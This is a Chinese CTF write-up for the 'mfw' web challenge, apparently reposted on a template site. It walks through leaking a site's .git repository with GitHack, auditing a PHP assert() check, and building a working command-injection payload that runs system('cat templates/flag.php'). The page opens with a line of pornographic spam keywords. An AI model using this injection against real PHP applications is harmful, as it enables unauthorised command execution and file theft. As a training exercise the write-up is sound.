国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網首頁
  2. >Toy博客

[CSAW/網絡安全] Git泄露+命令執(zhí)行 攻防世界 mfw 解題詳析

2年前作者:秋說分類:Toy博客閱讀(17)違法舉報

這篇具有很好參考價值的文章主要介紹了[CSAW/網絡安全] Git泄露+命令執(zhí)行 攻防世界 mfw 解題詳析。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

Home界面:

mfw攻防世界,# CTF賽題,網絡安全,git,web安全,git泄露,命令執(zhí)行,網絡安全
Home界面翻譯如下:
歡迎訪問我的網站!
我自己從頭開始寫的!
您可以使用上面的鏈接瀏覽頁面!

About界面:

mfw攻防世界,# CTF賽題,網絡安全,git,web安全,git泄露,命令執(zhí)行,網絡安全
觀察到Git,聯想Git泄露

Git泄露

Git是一個非常流行的開源分布式版本控制系統(tǒng),它被廣泛用于協同開發(fā)和代碼管理。許多網站和應用程序都使用Git作為其代碼管理系統(tǒng),并將其部署到生產環(huán)境中以維護其代碼庫。

然而,在配置不當的情況下,可能會導致.git文件夾被直接部署到線上環(huán)境中,這可能會導致Git泄露問題。
此時可使用githack等工具下載站點存儲庫的整個代碼歷史記錄和配置信息。

漏洞利用

通過枚舉工具或搜索引擎來查找?guī)в?git文件夾的存儲庫,以獲取包含未加密密碼、憑據和敏感信息的站點代碼庫。
如GET/.git以確認是否存在git泄露

查看是否存在Git漏洞

Payload:/.git

mfw攻防世界,# CTF賽題,網絡安全,git,web安全,git泄露,命令執(zhí)行,網絡安全
由上圖,存在Git漏洞。

下載泄漏文件

利用python的githacker庫下載泄露文件

GitHack的安裝本文不再贅述
詳情參考: [Python/網絡安全] Git漏洞之Githack工具基本安裝及使用詳析

打開Githack,輸入Payload:
python GitHack.py http://61.147.171.105:61017/.git
得到文件
mfw攻防世界,# CTF賽題,網絡安全,git,web安全,git泄露,命令執(zhí)行,網絡安全

代碼審計

其中,index.php文件存在以下代碼:

<?php
 
if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}
//傳入page參數,如果沒有,則設置為home
           
$file = "templates/" . $page . ".php";
//將page參數拼接成一個templates下的php文件,設置為變量file
 
// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
//判斷file中是否有 ..  如果有則直接退出 這是為了防止目錄遍歷
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!")
//檢查指定的文件是否存在。如果文件不存在,將拋出另一個斷言錯誤并停止腳本的執(zhí)行。
?>

姿勢

由于該代碼僅對目錄遍歷進行防范,因此可構造POC,執(zhí)行系統(tǒng)命令。

由于下載得到的文件中,templates目錄路徑下含有flag.php,故應讀取該文件中內容
mfw攻防世界,# CTF賽題,網絡安全,git,web安全,git泄露,命令執(zhí)行,網絡安全

構造POC如下:

?page=qiu or system("cat templates/flag.php");

由于qiu參數不存在,page=qiu返回false 可利用or執(zhí)行system函數

同時觀察到該行代碼:

assert("strpos('參數', '..') === false")

如果將上面的POC傳入,則變?yōu)?/p> 

assert("strpos('qiu or system("cat templates/flag.php");', '..') === false")

qiu未被括號閉合,該語句注入不成功

重新構造POC如下:

?page=qiu') or system("cat templates/flag.php");

則語句變?yōu)椋?/p> 

assert("strpos('qiu') or system("cat templates/flag.php");', '..') === false")

再用//將后面的語句注釋掉即可

構造POC如下:

?page=qiu') or system("cat templates/flag.php");//

則語句變?yōu)椋?/p> 

assert("strpos('qiu') or system("cat templates/flag.php");//', '..') === false")

最后的語句如下:

assert("strpos('qiu') or system("cat templates/flag.php");

即可實現命令的成功執(zhí)行:

mfw攻防世界,# CTF賽題,網絡安全,git,web安全,git泄露,命令執(zhí)行,網絡安全

總結

該題考察Git泄露之存儲庫讀取姿勢、代碼審計命令執(zhí)行,讀者可躬身實踐。

我是秋說,我們下次見。文章來源地址http://www.zghlxwxcb.cn/news/detail-740658.html

到了這里,關于[CSAW/網絡安全] Git泄露+命令執(zhí)行 攻防世界 mfw 解題詳析的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • 網絡安全攻防:ZigBee安全

    1.?ZigBee簡介 ZigBee(又稱紫蜂協議)是基于IEEE802.15.4標準的低功耗局域網協議。根據國際標準規(guī)定,ZigBee技術是一種短距離、低功耗的無線通信技術。ZigBee來源于蜜蜂的八字舞,由于蜜蜂(Bee)是靠飛翔和“嗡嗡”(Zig)地抖動翅膀的“舞蹈”來與同伴傳遞花粉所在方位信息

    2024年02月05日
    瀏覽(30)

  • 網絡攻防演練.網絡安全.學習

    網絡安全攻防演練是指通過模擬各種網絡攻擊手段,來測試自身安全防御能力和應對能力的一種演練活動。本文總結了網絡安全攻防演練的重要性、準備工作以及演練過程中需要注意的事項。 一、網絡安全攻防演練的重要性 網絡安全攻防演練是對自身網絡安全現狀的一種全面

    2024年02月13日
    瀏覽(25)

  • 【網絡安全】-- 網絡滲透技術攻防(--更新中)

    1.1.1 什么是網絡滲透攻擊 “網絡滲透攻擊”是對大型的網絡主機服務器群組采用的一種迂回漸進式的攻擊方法,通過長期而有計劃的逐步滲透攻擊進入網絡,最終控制整個網絡。 1.1.2 網絡滲透測試的意義 滲透測試是受信任的第三方進行的一種評估網絡安全的活動,它通過運

    2024年02月13日
    瀏覽(23)
  • 網絡安全工具合計(攻防工具)

    網絡安全工具合計(攻防工具)

    目錄 All-Defense-Tool 免責聲明 半/全自動化利用工具 信息收集工具 資產發(fā)現工具 子域名收集工具 目錄掃描工具 指紋識別工具 端口掃描工具 Burp插件 瀏覽器插件 郵箱釣魚 社工個人信息收集類 APP/公眾號/小程序相關工具 常用小工具 漏洞利用工具 漏洞掃描框架/工具 中間件/應用

    2024年02月13日
    瀏覽(24)

  • 網絡安全攻防演練項目介紹

    有很多朋友問我寫的攻防演練是什么? 本文給予回答 網絡安全攻防演練是公安部組織的面向稅務、電力、電信、銀行、鐵路、財政、廣電、水利、教育、互聯網、檢察院、法院、石油、交通等行業(yè)的政府單位/公司,開展的實戰(zhàn)攻防演練,也簡稱為護網。 攻防演練主要目標是

    2024年02月09日
    瀏覽(18)
  • 網絡安全領域關鍵信息泄露事件引發(fā)關注

    網絡安全領域關鍵信息泄露事件引發(fā)關注

    近日,一家知名網絡安全公司發(fā)布了一份報告揭露了一起重大信息泄露事件。據稱,該事件涉及大量敏感用戶數據的泄露引發(fā)了全球網絡安全領域的廣泛關注。 根據報道,該事件發(fā)生在全球范圍內涉及多個國家和組織。專家指出,此次泄露事件的規(guī)模和影響力令人震驚突顯了

    2024年02月09日
    瀏覽(22)
  • 網絡安全實驗室|網絡信息安全攻防學習平臺(腳本關1-6)

    網絡安全實驗室|網絡信息安全攻防學習平臺(腳本關1-6)

    傳送門: http://hackinglab.cn/ 點擊此處開啟抓包,send ti repeater 模塊 腳本來源: https://blog.csdn.net/hzxtjx/article/details/125692349 使用requests庫向網站發(fā)送HTTP請求,并使用re模塊使用正則表達式從網站的HTML內容中提取信息。所選的代碼塊定義了一個正則表達式模式r’/n(.*?)=i’。此模式

    2024年02月08日
    瀏覽(33)

  • 網絡安全學習筆記——藍隊實戰(zhàn)攻防

    目錄 藍隊及發(fā)展趨勢 ????????基本概念 ???????????發(fā)展趨勢 攻擊階段 ????????準備階段 ????????情報搜集 ????????建立據點 ????????橫向移動 攻擊戰(zhàn)術 ? ? ? ? 利用弱口令及通用口令 ????????利用互聯網邊界滲透內網 ????????利用通用產

    2024年02月10日
    瀏覽(25)
  • 網絡安全攻防技術:移動安全篇

    網絡安全攻防技術:移動安全篇

    隨著移動通信技術和移動應用的普及,無線網絡、移動智能設備等正以前所未有的速度迅猛發(fā)展,已經滲透到了社會的各個方面,成為人們生產和生活不可或缺的工具和手段。此外,被譽為繼計算機、互聯網之后世界信息產業(yè)發(fā)展的第三次浪潮的物聯網,亦得益于無線網絡、

    2024年04月09日
    瀏覽(24)

  • 網絡安全攻防戰(zhàn):保護個人隱私與數據安全

    網絡安全一直是一個備受關注的話題,隨著互聯網的普及和發(fā)展,個人隱私和數據安全面臨著越來越大的風險。網絡攻擊、數據泄露和隱私侵犯等問題不僅對個人造成巨大的損失,也可能對企業(yè)和組織的運營帶來不可逆轉的影響。因此,保護網絡隱私和數據安全已成為我們每

    2024年02月06日
    瀏覽(21)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包